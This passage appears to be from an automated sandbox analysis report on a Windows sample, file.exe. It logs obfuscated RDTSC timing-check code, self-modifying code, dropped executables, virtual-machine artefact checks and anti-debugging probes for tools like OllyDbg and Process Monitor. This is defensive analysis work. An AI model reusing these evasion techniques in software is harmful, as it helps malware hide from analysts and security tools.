Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0CE4 second address: 49F0D41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC741h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp-04h] 0x0000000c pushad 0x0000000d pushad 0x0000000e movzx ecx, bx 0x00000011 mov dx, 461Ah 0x00000015 popad 0x00000016 mov bx, A9E6h 0x0000001a popad 0x0000001b mov dword ptr [esi+08h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007FCBA46BC746h 0x00000027 jmp 00007FCBA46BC745h 0x0000002c popfd 0x0000002d mov ebx, ecx 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0D41 second address: 49F0D47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0D47 second address: 49F0D80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC73Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebx+70h] 0x0000000e pushad 0x0000000f call 00007FCBA46BC744h 0x00000014 pop edx 0x00000015 mov bh, ch 0x00000017 popad 0x00000018 push 00000001h 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d movsx ebx, ax 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0D80 second address: 49F0D87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0D87 second address: 49F0DA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 nop 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FCBA46BC741h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0DA1 second address: 49F0DD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FCBA4817E81h 0x0000000f nop 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FCBA4817E7Dh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0DD8 second address: 49F0DDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0DDE second address: 49F0DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0DE2 second address: 49F0DF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-18h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov si, 2F57h 0x00000012 push ecx 0x00000013 pop ebx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0DF7 second address: 49F0E0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBA4817E84h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0E0F second address: 49F0E13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0E13 second address: 49F0E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0E22 second address: 49F0E26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0E26 second address: 49F0E3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E85h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0E3F second address: 49F0E45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0E45 second address: 49F0E67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E83h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0E67 second address: 49F0E6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0E6B second address: 49F0E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0EE3 second address: 49F0EE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0EE9 second address: 49F0EED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0EED second address: 49F0F2B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC73Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test edi, edi 0x0000000d pushad 0x0000000e movzx eax, di 0x00000011 jmp 00007FCBA46BC741h 0x00000016 popad 0x00000017 js 00007FCC16E8AECFh 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FCBA46BC73Dh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0F2B second address: 49F0F31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0F31 second address: 49F0F64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC743h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebp-14h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FCBA46BC745h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0F64 second address: 49F1025 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, esi 0x0000000b pushad 0x0000000c jmp 00007FCBA4817E7Ch 0x00000011 push esi 0x00000012 pushfd 0x00000013 jmp 00007FCBA4817E81h 0x00000018 sbb ecx, 107C2946h 0x0000001e jmp 00007FCBA4817E81h 0x00000023 popfd 0x00000024 pop eax 0x00000025 popad 0x00000026 mov dword ptr [esi+0Ch], eax 0x00000029 jmp 00007FCBA4817E87h 0x0000002e mov edx, 772406ECh 0x00000033 pushad 0x00000034 mov ax, A4FBh 0x00000038 pushfd 0x00000039 jmp 00007FCBA4817E80h 0x0000003e add eax, 7476C848h 0x00000044 jmp 00007FCBA4817E7Bh 0x00000049 popfd 0x0000004a popad 0x0000004b sub eax, eax 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 mov di, cx 0x00000053 pushfd 0x00000054 jmp 00007FCBA4817E7Ch 0x00000059 sbb ecx, 709C0AA8h 0x0000005f jmp 00007FCBA4817E7Bh 0x00000064 popfd 0x00000065 popad 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F1025 second address: 49F1048 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 jmp 00007FCBA46BC740h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e lock cmpxchg dword ptr [edx], ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F1048 second address: 49F104C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F104C second address: 49F1050 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F1050 second address: 49F1056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F1056 second address: 49F10C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC744h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a jmp 00007FCBA46BC740h 0x0000000f test eax, eax 0x00000011 pushad 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FCBA46BC743h 0x00000019 add si, 4B5Eh 0x0000001e jmp 00007FCBA46BC749h 0x00000023 popfd 0x00000024 popad 0x00000025 popad 0x00000026 jne 00007FCC16E8AD5Ah 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F10C4 second address: 49F10C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F10C8 second address: 49F10DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC742h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F120E second address: 49F126B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+0Ch], eax 0x0000000c jmp 00007FCBA4817E7Eh 0x00000011 mov eax, dword ptr [esi+10h] 0x00000014 jmp 00007FCBA4817E80h 0x00000019 mov dword ptr [edx+10h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FCBA4817E87h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F126B second address: 49F1321 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC749h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+14h] 0x0000000c jmp 00007FCBA46BC73Eh 0x00000011 mov dword ptr [edx+14h], eax 0x00000014 pushad 0x00000015 movzx eax, bx 0x00000018 pushfd 0x00000019 jmp 00007FCBA46BC743h 0x0000001e adc ax, A69Eh 0x00000023 jmp 00007FCBA46BC749h 0x00000028 popfd 0x00000029 popad 0x0000002a mov eax, dword ptr [esi+18h] 0x0000002d pushad 0x0000002e mov cx, 7603h 0x00000032 pushfd 0x00000033 jmp 00007FCBA46BC748h 0x00000038 adc cx, 97C8h 0x0000003d jmp 00007FCBA46BC73Bh 0x00000042 popfd 0x00000043 popad 0x00000044 mov dword ptr [edx+18h], eax 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007FCBA46BC745h 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F1321 second address: 49F1331 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBA4817E7Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F1331 second address: 49F136D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+1Ch] 0x0000000b jmp 00007FCBA46BC747h 0x00000010 mov dword ptr [edx+1Ch], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FCBA46BC745h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F136D second address: 49F1394 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+20h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FCBA4817E7Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F1394 second address: 49F13F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC741h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+20h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f call 00007FCBA46BC743h 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007FCBA46BC749h 0x0000001b sub ah, FFFFFFC6h 0x0000001e jmp 00007FCBA46BC741h 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F13F3 second address: 49F1435 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007FCBA4817E83h 0x0000000b adc ah, FFFFFFFEh 0x0000000e jmp 00007FCBA4817E89h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov eax, dword ptr [esi+24h] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F1435 second address: 49F1439 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F1439 second address: 49F143F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F143F second address: 49F1445 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F1445 second address: 49F1449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F1449 second address: 49F1477 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC73Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+24h], eax 0x0000000e jmp 00007FCBA46BC740h 0x00000013 mov eax, dword ptr [esi+28h] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F1477 second address: 49F1494 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F1494 second address: 49F1588 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC741h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+28h], eax 0x0000000c pushad 0x0000000d movzx eax, dx 0x00000010 mov eax, edi 0x00000012 popad 0x00000013 mov ecx, dword ptr [esi+2Ch] 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FCBA46BC741h 0x0000001d xor cx, B806h 0x00000022 jmp 00007FCBA46BC741h 0x00000027 popfd 0x00000028 jmp 00007FCBA46BC740h 0x0000002d popad 0x0000002e mov dword ptr [edx+2Ch], ecx 0x00000031 jmp 00007FCBA46BC740h 0x00000036 mov ax, word ptr [esi+30h] 0x0000003a pushad 0x0000003b pushfd 0x0000003c jmp 00007FCBA46BC73Eh 0x00000041 add cx, 4908h 0x00000046 jmp 00007FCBA46BC73Bh 0x0000004b popfd 0x0000004c pushfd 0x0000004d jmp 00007FCBA46BC748h 0x00000052 jmp 00007FCBA46BC745h 0x00000057 popfd 0x00000058 popad 0x00000059 mov word ptr [edx+30h], ax 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 mov ax, di 0x00000063 pushfd 0x00000064 jmp 00007FCBA46BC73Fh 0x00000069 jmp 00007FCBA46BC743h 0x0000006e popfd 0x0000006f popad 0x00000070 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F1588 second address: 49F15E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [esi+32h] 0x0000000d jmp 00007FCBA4817E7Eh 0x00000012 mov word ptr [edx+32h], ax 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FCBA4817E7Eh 0x0000001d sub cx, 0DB8h 0x00000022 jmp 00007FCBA4817E7Bh 0x00000027 popfd 0x00000028 push eax 0x00000029 push edx 0x0000002a mov di, si 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F15E1 second address: 49F162F instructions: 0x00000000 rdtsc 0x00000002 mov di, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov eax, dword ptr [esi+34h] 0x0000000b jmp 00007FCBA46BC73Ch 0x00000010 mov dword ptr [edx+34h], eax 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FCBA46BC73Dh 0x0000001a or al, 00000006h 0x0000001d jmp 00007FCBA46BC741h 0x00000022 popfd 0x00000023 popad 0x00000024 test ecx, 00000700h 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov bh, 89h 0x0000002f mov di, cx 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F162F second address: 49F1635 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F1635 second address: 49F1639 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F1639 second address: 49F169A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FCC16FE5F4Ch 0x0000000e jmp 00007FCBA4817E7Fh 0x00000013 or dword ptr [edx+38h], FFFFFFFFh 0x00000017 pushad 0x00000018 pushad 0x00000019 mov esi, 06740FA1h 0x0000001e pushfd 0x0000001f jmp 00007FCBA4817E7Eh 0x00000024 adc ax, 1738h 0x00000029 jmp 00007FCBA4817E7Bh 0x0000002e popfd 0x0000002f popad 0x00000030 movzx ecx, di 0x00000033 popad 0x00000034 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FCBA4817E7Eh 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F169A second address: 49F16ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC73Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or dword ptr [edx+40h], FFFFFFFFh 0x0000000d jmp 00007FCBA46BC746h 0x00000012 pop esi 0x00000013 pushad 0x00000014 mov di, ax 0x00000017 mov ch, C1h 0x00000019 popad 0x0000001a pop ebx 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e push edx 0x0000001f mov bx, si 0x00000022 pop eax 0x00000023 popad 0x00000024 leave 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FCBA46BC743h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 4739DC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 69E98A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005F2B1C rdtsc 1_2_005F2B1C
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\23RE4w32fN\Bunifu_UI_v1.5.3.dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\dll[1]
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\23RE4w32fN\Y-Cleaner.exe
Source: C:\Users\user\Desktop\file.exe TID: 4312 Thread sleep count: 74 > 30
Source: C:\Users\user\Desktop\file.exe TID: 1408 Thread sleep time: -42021s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 4312 Thread sleep count: 68 > 30
Source: C:\Users\user\Desktop\file.exe TID: 6380 Thread sleep time: -34017s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 4312 Thread sleep count: 160 > 30
Source: C:\Users\user\Desktop\file.exe TID: 4312 Thread sleep count: 126 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7440 Thread sleep time: -36000s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 6176 Thread sleep time: -38019s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 6384 Thread sleep time: -50025s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 6504 Thread sleep time: -40020s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 6448 Thread sleep time: -32016s >= -30000s
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00417727 FindFirstFileExW, 1_2_00417727
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_10007EA9 FindFirstFileExW, 1_2_10007EA9
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0494798E FindFirstFileExW, 1_2_0494798E
Source: file.exe, file.exe, 00000001.00000002.2023887515.00000000005F1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000001.00000002.2026166176.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWq\]
Source: Amcache.hve.14.dr Binary or memory string: VMware
Source: Amcache.hve.14.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.14.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.14.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.14.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.14.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.14.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.14.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: file.exe, 00000001.00000002.2024454401.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2024454401.0000000000C08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.14.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.14.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.14.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.14.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.14.dr Binary or memory string: vmci.sys
Source: Amcache.hve.14.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.14.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.14.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.14.dr Binary or memory string: VMware20,1
Source: Amcache.hve.14.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.14.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.14.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.14.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.14.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.14.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.14.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.14.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.14.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.14.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: file.exe, 00000001.00000002.2023887515.00000000005F1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Amcache.hve.14.dr Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: Amcache.hve.14.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
